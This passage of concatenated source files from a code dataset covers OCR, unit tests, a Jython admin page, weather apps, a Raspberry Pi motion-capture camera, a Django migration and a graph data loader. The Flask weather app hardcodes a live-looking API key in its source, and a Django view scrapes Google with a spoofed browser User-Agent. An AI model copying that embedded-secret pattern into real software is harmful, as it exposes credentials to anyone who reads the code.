těmito\r\n hodnotami se vykreslí\r\n \"\"\"\r\n\r\n print(\"License Plate Recognition (LPR)\\n\")\r\n print(\"SPZ auta:\",text)\r\n \"\"\"\r\n Zobrazení výsledného převodu textu z obrázku\r\n \"\"\"\r\n\r\n if not imgShow: return text\r\n \"\"\"\r\n Vrátí text spz kvuli zapisu do databaze\r\n \"\"\"\r\n\r\n img = cv2.resize(img,(500,300))\r\n Cropped = cv2.resize(Cropped,(400,200))\r\n \"\"\"\r\n Zvětšení oříznutého obrázku\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('original',img)\r\n \"\"\"\r\n Zobrazí originál\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('vysledek',Cropped)\t\r\n \"\"\"\r\n Zobrazí oříznutý výsledek\r\n \"\"\"\r\n\r\n cv2.waitKey(0)\r\n \"\"\"\r\n Neukončí program po dokončení operací\r\n \"\"\"\r\n\r\n cv2.destroyAllWindows()\r\n \"\"\"\r\n Zničí všechny okna\r\n \"\"\"\r\n\r\n\r\n##### Nápověda k nastavení #####\r\n\r\n\"\"\" TESSERACT nastaveni\r\ndef build_tesseract_options( psm=7):\r\n # tell Tesseract to only OCR alphanumeric characters\r\n alphanumeric = \"ABCDEFHIJKLMNPRSTUVXYZ0123456789\"\r\n options = \"-c 
tessedit_char_whitelist={}\".format(alphanumeric)\r\n # set the PSM mode\r\n options += \" --psm {}\".format(psm)\r\n # return the built options string\r\n return options\r\n\"\"\"\r\n\r\n\"\"\"\r\nmorphology - mozne vyuzit - krasne vykresluje kontrast\r\nrectKernel = cv2.getStructuringElement(cv2.MORPH_RECT, (13, 5)) ###cisla (13,5) meni toleranci ?\r\nblackhat = cv2.morphologyEx(gray, cv2.MORPH_BLACKHAT, rectKernel)\r\ncv2.imshow('BlackHat',blackhat) #kontorla\r\n\"\"\"\r\n","sub_path":"Projects/LPRRecognition/LPRrecognizationNUMPY/ver2/LPR.py","file_name":"LPR.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"318335805","text":"# Copyright 2015 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nfrom pytest import fixture\nfrom solar.system_log import change\nfrom solar.system_log import data\nfrom solar.system_log import operations\nfrom solar.core.resource import resource\nfrom solar.interfaces import orm\n\n\ndef test_revert_update():\n commit = {'a': '10'}\n previous = {'a': '9'}\n res = orm.DBResource(id='test1', name='test1', base_path='x')\n res.save()\n res.add_input('a', 'str', '9')\n action = 'update'\n\n resource_obj = resource.load(res.name)\n\n assert resource_obj.args == previous\n\n log = data.SL()\n logitem =change.create_logitem(\n res.name, action, change.create_diff(commit, previous))\n log.append(logitem)\n resource_obj.update(commit)\n operations.move_to_commited(logitem.log_action)\n\n assert resource_obj.args == commit\n\n change.revert(logitem.uid)\n assert resource_obj.args == previous\n","sub_path":"solar/solar/test/test_system_log_api.py","file_name":"test_system_log_api.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"501658589","text":"import random\nimport unittest\nimport numpy as np\n\nfrom FCS_CPA import ball_in_bowl, Ymn_Leibniz_matAB, demo_Ymn_Leibniz, demo_Ymn_Binomial, Ymn_electron_zeroK\n\nhfe = lambda x,y: np.max(np.abs(x-y)/(np.abs(x)+np.abs(y)+1e-3))\nhfe_r5 = lambda x,y: round(hfe(x,y,),5)\n\n\nclass YmnUnittest(unittest.TestCase):\n\n def test_ball_in_bowl(self):\n def hf1(x0, x1):\n ret0 = []\n ret1 = []\n for y1,y2 in ball_in_bowl(x0, x1):\n ret0.append(y1)\n ret1.append(y2)\n return ret0, ret1\n tmp1,tmp2 = hf1(0, 3)\n self.assertEqual([], tmp1)\n self.assertEqual([], tmp2)\n\n tmp1,tmp2 = hf1(3, 1)\n self.assertEqual([(3,)], tmp1)\n self.assertEqual([(0,0,0,1)], tmp2)\n\n tmp1,tmp2 = hf1(3, 2)\n self.assertEqual([(0,3),(1,2),(2,1),(3,0)], tmp1)\n self.assertEqual([(1,0,0,1),(0,1,1,0),(0,1,1,0),(1,0,0,1)], tmp2)\n\n def test_Ymn_Leibniz_matAB(self):\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 1)\n self.assertTrue(hfe(np.array([1]), tmp1)<1e-7)\n self.assertEqual([[1,0]],tmp2.tolist())\n\n tmp1,tmp2 = Ymn_Leibniz_matAB(1, 2)\n self.assertTrue(hfe(np.array([1]), tmp1)<1e-7)\n self.assertEqual([[0,1]],tmp2.tolist())\n\n tmp1,tmp2 = 
Ymn_Leibniz_matAB(2, 4)\n self.assertTrue(hfe(np.array([6,8]), tmp1)<1e-7)\n self.assertEqual([[0,2],[2,0]],tmp2.tolist())\n\n def test_Ymn(self):\n fL = random.uniform(0, 1)\n fR = random.uniform(0, 1)\n for m in range(1, 7):\n for n in range(1, 7):\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'electron')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'electron')\n self.assertAlmostEqual(tmp1, tmp2)\n tmp1 = demo_Ymn_Leibniz(m, n, fL, fR, 'phonon')\n tmp2 = demo_Ymn_Binomial(m, n, fL, fR, 'phonon')\n self.assertAlmostEqual(tmp1, tmp2)\n\n def test_Ymn_electron_zeroK(self):\n ground_truth = [\n (1, [1]),\n (2, [1,2]),\n (3, [1,6,6]),\n (4, [1,14,36,24]),\n (5, [1,30,150,240,120]),\n ]\n for x,ret_ in ground_truth:\n ret = Ymn_electron_zeroK(x)\n for y1,y2 in zip(ret_,ret):\n self.assertAlmostEqual(y1, y2)\n","sub_path":"test_Ymn_coefficient.py","file_name":"test_Ymn_coefficient.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"206460566","text":"# coding=utf-8\r\nfrom base_action import *\r\nfrom user_query import UserQuery\r\nfrom article_query import ArticleQuery\r\nfrom resource_query import ResourceQuery\r\nfrom photo_query import PhotoQuery\r\nfrom group_query import GroupQuery\r\nfrom base_action import ActionResult\r\nfrom cn.edustar.jitar.pojos import User, Article, Resource, Photo, Group, AccessControl, TimerCount\r\nfrom cn.edustar.jitar.model import Configure\r\nfrom cn.edustar.jitar.util import CommonUtil\r\nfrom base_manage import *\r\n\r\n# 后台管理框架的页面.\r\nclass admin (BaseManage):\r\n # 定义要返回的页面常量.\r\n ADMIN_MAIN = \"/WEB-INF/ftl/admin/main.ftl\"\r\n \r\n def execute(self):\r\n # 验证用户必须具有管理权限.\r\n # 本页面的后台管理需要的权限有:系统管理员,系统用户管理员,系统内容管理员 \r\n\r\n canManage = False\r\n if self.isSystemAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemAdmin\", \"1\")\r\n \r\n if self.isSystemUserAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemUserAdmin\", \"1\")\r\n \r\n if self.isSystemContentAdmin():\r\n canManage = True\r\n request.setAttribute(\"isSystemContentAdmin\", \"1\") \r\n \r\n \r\n if canManage == False:\r\n self.addActionError(u\"没有管理权限,需要的权限为系统管理员、系统用户管理员和系统内容管理员.\")\r\n return ActionResult.ERROR\r\n \r\n cmd = request.getParameter(\"cmd\")\r\n if cmd == \"menu\":\r\n autoHtml = __jitar__.configService.getConfigure().getBoolValue(Configure.SITE_AUTO_HTML, True)\r\n request.setAttribute(\"autoHtml\", autoHtml) \r\n plugin_svc = __spring__.getBean(\"pluginService\")\r\n plugin_list = plugin_svc.getPluginList()\r\n request.setAttribute(\"plugin_list\", plugin_list)\r\n # 判断是否有频道可以管理\r\n channelPageService = __spring__.getBean(\"channelPageService\")\r\n hasChennels = channelPageService.getChannelList() \r\n request.setAttribute(\"hasChennels\", hasChennels)\r\n webSiteManageService = __spring__.getBean(\"webSiteManageService\")\r\n bklist = webSiteManageService.getBackYearList(\"article\")\r\n if bklist != None and len(bklist) > 0:\r\n request.setAttribute(\"bklist\", bklist)\r\n \r\n jitarColumnService = __spring__.getBean(\"jitarColumnService\")\r\n columnlist = jitarColumnService.getJitarColumnList()\r\n if columnlist != None and len(columnlist) > 0:\r\n request.setAttribute(\"columnlist\", columnlist)\r\n userService = __jitar__.userService\r\n userTypeList = userService.getAllUserType()\r\n if userTypeList != None and len(userTypeList) > 0:\r\n request.setAttribute(\"userTypeList\", userTypeList)\r\n return \"/WEB-INF/ftl/admin/menu.ftl\"\r\n elif cmd == 
\"main\":\r\n return self.main()\r\n else:\r\n url = self.params.getStringParam(\"url\")\r\n if url == None or url == \"\": url = \"?cmd=main\"\r\n request.setAttribute(\"url\", url)\r\n return \"/WEB-INF/ftl/admin/index.ftl\"\r\n\r\n\r\n # 后台管理的统计数据\r\n def main(self):\r\n request.setAttribute(\"site_stat\", __spring__.getBean(\"timerCountService\").getTimerCountById(TimerCount.COUNT_TYPE_SITE))\r\n return self.ADMIN_MAIN\r\n","sub_path":"WebContent/manage/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"465731285","text":"import requests\nfrom flask import Flask, render_template, request\nimport urllib\n\napp = Flask(__name__)\n\n# Defined these variables outside of the home function so I can use them globally within the function\nname = ''\ndescription = ''\ntemp = ''\nwind = '' \nicon = ''\n\n# Routes for web pages\n@app.route('/', methods=['POST', 'GET'])\ndef home():\n if request.method == 'POST':\n global name\n global description\n global temp\n global wind\n global icon\n\n city = request.form.get('city')\n \n try:\n #API call below, then formatting the response into json\n weather_key = '7113e7c022e4e898beaddbba87f4b835'\n url = 'https://api.openweathermap.org/data/2.5/weather'\n params = {'APPID': weather_key, 'q': city,'icon': icon, 'units': 'imperial'}\n response = requests.get(url, params=params)\n weather = response.json()\n\n # Weather information stored into variables and formatted into a string\n name = weather['name']\n description = weather['weather'][0]['description']\n temp = weather['main']['temp']\n wind = weather['wind']['speed']\n icon = weather['weather'][0]['icon']\n except:\n return 'ERROR, SOMETHING WENT WRONG, PLEASE ENTER A VALID CITY?'\n \n return render_template('layout.html', name=name, description=description, temp=temp, wind=wind, icon=icon)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362562352","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom bs4 import BeautifulSoup as bs\nimport requests\n\n# Create your views here.\n\n@login_required(login_url=\"login\")\ndef weather(request):\n USER_AGENT = \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36\"\n # US english\n LANGUAGE = \"en-US,en;q=0.5\"\n session = requests.Session()\n session.headers['User-Agent'] = USER_AGENT\n session.headers['Accept-Language'] = LANGUAGE\n session.headers['Content-Language'] = LANGUAGE\n html = session.get(\"https://www.google.com/search?q=weather+kuala+lumpur\")\n # create a new soup\n soup = bs(html.text, \"html.parser\")\n # store all results on this dictionary\n result = {}\n # extract region\n result['region'] = soup.find(\"div\", attrs={\"id\": \"wob_loc\"}).text\n # extract temperature now\n result['temp_now'] = soup.find(\"span\", attrs={\"id\": \"wob_tm\"}).text\n # get the day and hour now\n result['dayhour'] = soup.find(\"div\", attrs={\"id\": \"wob_dts\"}).text\n # get the actual weather\n result['weather_now'] = soup.find(\"span\", attrs={\"id\": \"wob_dc\"}).text\n # get the precipitation\n result['precipitation'] = soup.find(\"span\", attrs={\"id\": \"wob_pp\"}).text\n # get the % of humidity\n result['humidity'] = 
soup.find(\"span\", attrs={\"id\": \"wob_hm\"}).text\n # extract the wind\n result['wind'] = soup.find(\"span\", attrs={\"id\": \"wob_ws\"}).text\n next_days = []\n days = soup.find(\"div\", attrs={\"id\": \"wob_dp\"})\n for day in days.findAll(\"div\", attrs={\"class\": \"wob_df\"}):\n # extract the name of the day\n day_name = day.find(\"div\", attrs={\"class\": \"QrNVmd Z1VzSb\"}).attrs['aria-label']\n # get weather status for that day\n weather = day.find(\"img\").attrs[\"alt\"]\n temp = day.findAll(\"span\", {\"class\": \"wob_t\"})\n # maximum temparature in Celsius, use temp[1].text if you want fahrenheit\n max_temp = temp[0].text\n # minimum temparature in Celsius, use temp[3].text if you want fahrenheit\n min_temp = temp[2].text\n next_days.append({\"name\": day_name, \"weather\": weather, \"max_temp\": max_temp, \"min_temp\": min_temp})\n # append to result\n result['next_days'] = next_days\n return render(request, 'weather/weather.html', {'nav':'weather','result':result})","sub_path":"travellerplan/weather/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"349324666","text":"import time\nimport numpy\nimport io\nimport os\nimport logging\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom threading import Thread\nfrom PIL import Image\n\nfrom camApp import app\nfrom camApp.camera.base_camera import BaseCamera\nfrom camApp.utils.helpers import get_float, get_int\n\ntry:\n import picamera\nexcept Exception:\n logging.root.warning('Error importing picamera, running Windows?')\n\n\nclass Camera(BaseCamera):\n movement_detection = False\n recording = False\n videos_seconds_duration = 300\n capturing_time_duration = 30\n captures_interval_time = 1\n nrmse_value_movement_detected = 0.980\n times_movement_detected_limit = 3\n resolution = (640, 480)\n iso_value = ''\n idle_timeout = 15\n event_thread_timeout = 30\n frame_rate = ''\n warmup_time = 2\n camera_captures_dir = os.path.join(app.config['BASE_DIR'], 'camApp', 'camera', 'captures')\n\n _movement_detected = False\n _frames_to_compare = [None, None]\n _movement_detection_count = 0\n _start_capturing_timestamp = 0\n _last_capture_timestamp = 0\n\n # Testing\n _test_nrmse_obatined_values = defaultdict(int)\n\n @staticmethod\n def frames():\n # Default res (720, 480), (1280, 720)\n resolution = Camera.resolution\n with picamera.PiCamera(resolution=resolution) as camera:\n # Available iso 100, 200, 320, 400, 500, 640, 800.\n if Camera.iso_value:\n camera.iso = Camera.iso_value\n\n # let camera warm up\n time.sleep(Camera.warmup_time)\n\n stream = io.BytesIO()\n for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=False):\n stream.seek(0)\n\n yield stream.read()\n\n # reset stream for next frame\n stream.seek(0)\n stream.truncate()\n\n @staticmethod\n def detect_movement_and_capture():\n \"\"\"\n Start thread to detect movement and save frames into filesystem\n :return:\n \"\"\"\n Thread(target=Camera()._detect_movement_and_capture).start()\n\n @staticmethod\n def _detect_movement_and_capture():\n \"\"\"\n Get frames and compare them, if it detect movement store images from the camera to the filesystem\n :return:\n \"\"\"\n # Avoid multiple threads\n if not Camera.movement_detection:\n Camera.movement_detection = True\n\n # Get init frames\n Camera._frames_to_compare[0] = Camera.get_frame()\n Camera._frames_to_compare[1] = Camera.get_frame()\n\n # Variable used to stop the 
movement detection\n while Camera.movement_detection:\n compare_result = Camera.nrmse_compare(Camera._frames_to_compare[0], Camera._frames_to_compare[1])\n if compare_result < Camera.nrmse_value_movement_detected:\n Camera._movement_detection_count += 1\n logging.root.info('Movement detected {} - count {}'.format(str(compare_result),\n str(Camera._movement_detection_count)))\n\n # Testing\n Camera._test_nrmse_obatined_values[compare_result.round(3)] += 1\n else:\n Camera._movement_detection_count = 0\n Camera._frames_to_compare[0] = Camera._frames_to_compare[1]\n Camera._frames_to_compare[1] = Camera.get_frame()\n\n Camera.activate_capture()\n\n if Camera._movement_detected:\n Camera.store_image(Camera._frames_to_compare[0])\n\n @staticmethod\n def store_image(frame):\n \"\"\"\n Save the frame into the file system, we will store the images for capturing_time_duration seconds after\n detecting movement, if no movement have been detected we stop saving the images\n :param frame: Image as bytes\n :return:\n \"\"\"\n # Store 1 image every captures_interval_time to avoid to store to many images\n if time.time() - Camera._last_capture_timestamp > Camera.captures_interval_time:\n Camera._last_capture_timestamp = time.time()\n\n frame = Image.open(io.BytesIO(frame))\n timestamp = datetime.now().strftime('%y-%m-%d-%H-%M-%S-%f')\n file_path = os.path.join(Camera.camera_captures_dir, 'image_{}.jpg'.format(timestamp))\n frame.save(file_path, 'JPEG')\n\n # Validate if the time to save images has expired, if expired set the variable to False\n if time.time() - Camera._start_capturing_timestamp > Camera.capturing_time_duration:\n Camera._movement_detected = False\n logging.root.info('Stop capturing images')\n\n @staticmethod\n def activate_capture():\n \"\"\"\n Activate and init the variables used to save the images after detecting movement\n We save images if detect movement more than 3 times in a row, to avoid miss movement detections due to shadows\n :return:\n \"\"\"\n if Camera._movement_detection_count > Camera.times_movement_detected_limit:\n Camera._movement_detected = True\n Camera._start_capturing_timestamp = time.time()\n\n @staticmethod\n def nrmse_compare(frame_1, frame_2):\n \"\"\"\n Compare images using normalization of the root of the mean squared error\n We will consider movement if the result is <0.985\n :param frame_1: Image as bytes\n :param frame_2: Image as bytes\n :return: float, 1.0 Images equals, < 1.0 images difference\n \"\"\"\n frame_1 = Image.open(io.BytesIO(frame_1)).convert('L')\n frame_2 = Image.open(io.BytesIO(frame_2)).convert('L')\n\n if frame_1.size != frame_2.size:\n logging.root.error(\"Error: images size differ\")\n return 1.0\n\n for band1, band2 in zip(frame_1.split(), frame_2.split()):\n frame_1 = numpy.asarray(band1, dtype=numpy.double)\n frame_2 = numpy.asarray(band2, dtype=numpy.double)\n\n a, b = frame_1.shape\n rmse = numpy.sqrt(numpy.sum((frame_2 - frame_1) ** 2) / float(a * b))\n max_val = max(numpy.max(frame_1), numpy.max(frame_2))\n min_val = min(numpy.min(frame_1), numpy.min(frame_2))\n return 1 - (rmse / (max_val - min_val))\n\n @staticmethod\n def get_images_captured():\n \"\"\"\n Return a list of strings with all the name of the captured images\n :return: List of strings\n \"\"\"\n return os.listdir(Camera.camera_captures_dir)\n\n @staticmethod\n def remove_captures():\n \"\"\"\n Remove all the captures in the captures folder\n :return: List of removed paths\n \"\"\"\n removed = []\n try:\n files = os.listdir(Camera.camera_captures_dir)\n for file in 
files:\n path = os.path.join(Camera.camera_captures_dir, file)\n os.remove(path)\n removed.append(path)\n return removed\n except Exception as e:\n logging.root.error('Error removing captures {}'.format(str(e)))\n return removed\n\n @staticmethod\n def change_camera_config(config):\n \"\"\"\n Method to update the configurable parameters of the camera\n :param config: JSON with the configurable values\n :return:\n \"\"\"\n if 'capturing_time_duration' in config:\n value = get_float(config['capturing_time_duration'])\n if type(value) == float:\n Camera.capturing_time_duration = value\n if 'captures_interval_time' in config:\n value = get_float(config['captures_interval_time'])\n if type(value) == float:\n Camera.captures_interval_time = value\n if 'nrmse_value_movement_detected' in config:\n value = get_float(config['nrmse_value_movement_detected'])\n if type(value) == float:\n Camera.nrmse_value_movement_detected = value\n if 'times_movement_detected_limit' in config:\n value = get_float(config['times_movement_detected_limit'])\n if type(value) == float:\n Camera.times_movement_detected_limit = value\n if 'resolution' in config:\n value = get_int(config['resolution'][0])\n if type(value) == int:\n Camera.resolution = (value, Camera.resolution[1])\n value = get_int(config['resolution'][1])\n if type(value) == int:\n Camera.resolution = (Camera.resolution[0], value)\n if 'iso_value' in config:\n value = get_int(config['iso_value'])\n if type(value) == int:\n Camera.iso_value = value\n if 'idle_timeout' in config:\n value = get_int(config['idle_timeout'])\n if type(value) == int:\n BaseCamera.idle_timeout = value\n Camera.idle_timeout = value\n if 'frame_rate' in config:\n value = get_float(config['frame_rate'])\n if type(value) == float:\n Camera.frame_rate = value\n if 'warmup_time' in config:\n value = get_float(config['warmup_time'])\n if type(value) == float:\n Camera.warmup_time = value\n if 'event_thread_timeout' in config:\n value = get_int(config['event_thread_timeout'])\n if type(value) == int:\n Camera.event_thread_timeout = value\n BaseCamera.event_thread_timeout = value\n if 'videos_seconds_duration' in config:\n value = get_int(config['videos_seconds_duration'])\n if type(value) == int:\n Camera.videos_seconds_duration = value\n\n\nclass Recording(object):\n @staticmethod\n def record():\n Thread(target=Recording()._record).start()\n\n @staticmethod\n def _record():\n if not Camera.recording:\n Camera.recording = True\n resolution = Camera.resolution\n with picamera.PiCamera(resolution=resolution) as camera:\n # let camera warm up\n time.sleep(Camera.warmup_time)\n\n # Available iso 100, 200, 320, 400, 500, 640, 800.\n if Camera.iso_value:\n camera.iso = Camera.iso_value\n\n while Camera.recording:\n timestamp = datetime.now().strftime('%y-%m-%d-%H-%M-%S-%f')\n file_path = os.path.join(Camera.camera_captures_dir, 'video_{}.h264'.format(timestamp))\n\n camera.start_recording(file_path)\n camera.wait_recording(Camera.videos_seconds_duration)\n camera.stop_recording()\n\n # class Camera(Camera2):\n # \"\"\"\n # Fake Camera class to test outside Raspberry\n # \"\"\"\n # _aux_frames = []\n #\n # def __init__(self):\n # \"\"\"\n # Load images that will fake camera frames\n # \"\"\"\n # import cv2\n # import os\n # images_folder = os.path.join(os.path.dirname(__file__), '..', 'static', 'test_images')\n # aux_frames = []\n # for f in ['1', '2', '3']:\n # file_path = os.path.join(images_folder, f + '.jpg')\n # image = cv2.imread(file_path)\n # # encode image as jpeg\n # _, img_encoded = 
cv2.imencode('.jpg', image)\n # aux_frames.append(img_encoded.tostring())\n # Camera._aux_frames = aux_frames\n # Camera2.__init__(self)\n #\n # @staticmethod\n # def frames():\n # while True:\n # time.sleep(1)\n # yield Camera._aux_frames[int(time.time()) % 3]\n","sub_path":"camApp/camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":11753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"41984072","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport mptt.fields\nimport alex_coder.utils.autoslug_field\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='\\u0418\\u043c\\u044f')),\n ('email', models.EmailField(max_length=255, verbose_name='Email')),\n ('site', models.CharField(max_length=255, verbose_name='\\u0421\\u0430\\u0439\\u0442', blank=True)),\n ('text', models.TextField(verbose_name='\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0439')),\n ('ip', models.GenericIPAddressField()),\n ('approved', models.BooleanField(default=True, verbose_name='\\u041e\\u0434\\u043e\\u0431\\u0440\\u0435\\u043d\\u043e')),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('lft', models.PositiveIntegerField(editable=False, db_index=True)),\n ('rght', models.PositiveIntegerField(editable=False, db_index=True)),\n ('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),\n ('level', models.PositiveIntegerField(editable=False, db_index=True)),\n ('parent', mptt.fields.TreeForeignKey(related_name='children', blank=True, to='blog.Comment', null=True)),\n ],\n options={\n 'ordering': ['created'],\n 'verbose_name': '\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0439',\n 'verbose_name_plural': '\\u041a\\u043e\\u043c\\u043c\\u0435\\u043d\\u0442\\u0430\\u0440\\u0438\\u0438',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Post',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=255)),\n ('slug', alex_coder.utils.autoslug_field.AutoSlugField(editable=False, populate_from=b'head_title', max_length=255, blank=True, unique=True)),\n ('text', models.TextField(blank=True)),\n ('publication_date', models.DateTimeField(null=True, blank=True)),\n ('meta_keywords', models.CharField(max_length=255, blank=True)),\n ('meta_description', models.CharField(max_length=255, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('modified', models.DateTimeField(auto_now=True)),\n ],\n options={\n 'ordering': ['-publication_date'],\n 'verbose_name': '\\u041f\\u043e\\u0441\\u0442',\n 'verbose_name_plural': '\\u041f\\u043e\\u0441\\u0442\\u044b',\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='comment',\n name='post',\n field=models.ForeignKey(to='blog.Post'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='comment',\n name='user',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n 
]\n","sub_path":"alex_coder/blog/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"356809379","text":"from __future__ import generators, print_function\nimport numpy as np\nfrom random import shuffle\nfrom scipy.io import loadmat\n\nimport functools\nimport Queue\n#from multiprocessing import Process, Queue, Manager, Pool\nimport threading\nimport time\nfrom collections import defaultdict\n\n\ndef async_prefetch_wrapper(iterable, buffer=100):\n \"\"\"\n wraps an iterater such that it produces items in the background\n uses a bounded queue to limit memory consumption\n \"\"\"\n done = 'DONE'# object()\n\n def worker(q, it):\n for item in it:\n q.put(item)\n q.put(done)\n\n # launch a thread to fetch the items in the background\n queue = Queue.Queue(buffer)\n\n #pool = Pool()\n #m = Manager()\n #queue = m.Queue()\n it = iter(iterable)\n #workers = pool.apply_async(worker, (queue, it))\n thread = threading.Thread(target=worker, args=(queue, it))\n #thread = Process(target=worker, args=(queue, it))\n thread.daemon = True\n thread.start()\n # pull the items of the queue as requested\n while True:\n item = queue.get()\n if item == 'DONE':#done:\n return\n else:\n yield item\n\n #pool.close()\n #pool.join()\n\n\ndef async_prefetch(func):\n \"\"\"\n decorator to make generator functions fetch items in the background\n \"\"\"\n @functools.wraps(func)\n def wrapper(*args, **kwds):\n return async_prefetch_wrapper(func(*args, **kwds))\n\n return wrapper\n\nclass DataSet(object):\n def __init__(self, cfg):\n \"\"\"Construct a DataSet.\n \"\"\"\n self.cfg = cfg\n self.all_walks = np.fliplr(np.loadtxt(cfg.walks_dir, dtype=np.int)) # reverse the sequence\n self.node_seq = self.all_walks[:, -1] # index by ending node\n self.all_labels = self.get_labels(cfg.label_dir)\n self.all_features= self.get_fetaures(cfg.features_dir)\n\n #Increment the positions by 1 and mark the 0th one as False\n self.train_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'train_ids.npy')))\n self.val_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'val_ids.npy')))\n self.test_nodes = np.concatenate(([False], np.load(cfg.label_fold_dir + 'test_ids.npy')))\n # [!!!IMP!!]Assert no overlap between test/val/train nodes\n\n self.change = 0\n self.path_pred_variance = {}\n self.label_cache, self.update_cache = {0:self.all_labels[0]}, {}\n self.wce = self.get_wce()\n\n def get_fetaures(self, path):\n # Serves 2 purpose:\n # a) add feature for dummy node 0 a.k.a and \n # b) increments index of all features by 1, thus aligning it with indices in walks\n all_features = np.load(path)\n all_features = all_features.astype(np.float32, copy=False) # Required conversion for Python3\n all_features = np.concatenate(([np.zeros(all_features.shape[1])], all_features), 0)\n return all_features\n\n def get_labels(self, path):\n # Labels start with node '0'; Walks_data with node '1'\n # To get corresponding mapping, increment the label node number by 1\n # add label for dummy node 0 a.k.a and \n all_labels = np.load(path)\n all_labels = np.concatenate(([np.zeros(all_labels.shape[1])], all_labels), 0)\n\n return all_labels\n\n def get_wce(self):\n if self.cfg.solver.wce:\n valid = self.train_nodes + self.val_nodes\n tot = np.dot(valid, self.all_labels)\n wce = 1/(len(tot) * (tot*1.0/np.sum(tot)))\n else:\n wce = [1]*self.all_labels.shape[1]\n\n print(\"Cross-Entropy weights: 
\",wce)\n return wce\n\n\n def accumulate_label_cache(self, labels, nodes):\n #Aggregates all the labels for the corresponding nodes\n #and tracks the count of updates made\n default = (self.all_labels[0], 0) #Initial estimate -> all_zeros\n #WTF!labels = labels[0]\n \n if self.cfg.data_sets.binary_label_updates:\n #Convert to binary and keep only the maximum value as 1\n amax = np.argmax(labels, axis = 1)\n labels = np.zeros(labels.shape)\n for idx, pos in enumerate(amax):\n labels[idx,pos] = 1\n \n for idx, node in enumerate(nodes):\n prv_label, prv_count = self.update_cache.get(node, default)\n new_label = prv_label + labels[idx]\n new_count = prv_count + 1\n self.update_cache[node] = (new_label, new_count)\n\n def update_label_cache(self):\n #Average all the predictions made for the corresponding nodes and reset cache\n alpha = self.cfg.solver.label_update_rate\n\n update_no = len(self.path_pred_variance.items())\n self.path_pred_variance[update_no] = {}\n\n if len(self.label_cache.items()) <= 1: alpha =1\n\n for k, v in self.update_cache.items():\n old = self.label_cache.get(k, self.label_cache[0])\n cur = v[0]/v[1]\n new = (1-alpha)*old + alpha*cur\n self.change += np.mean((new - old) **2)\n self.path_pred_variance[update_no][k] = cur\n self.label_cache[k] = new\n\n print(\"\\nChange in label: :\", np.sqrt(self.change/self.cfg.data_sets._len_vocab)*100)\n self.change = 0\n self.update_cache = {}\n\n def get_nodes(self, dataset):\n nodes = []\n if dataset == 'train':\n nodes = self.train_nodes\n elif dataset == 'val':\n nodes = self.val_nodes\n elif dataset == 'test':\n nodes = self.test_nodes\n elif dataset == 'all':\n # Get all the nodes except the 0th node\n nodes = [True]*len(self.train_nodes)\n nodes[0] = False\n else:\n raise ValueError\n\n return nodes\n\n @async_prefetch\n def next_batch(self, dataset, 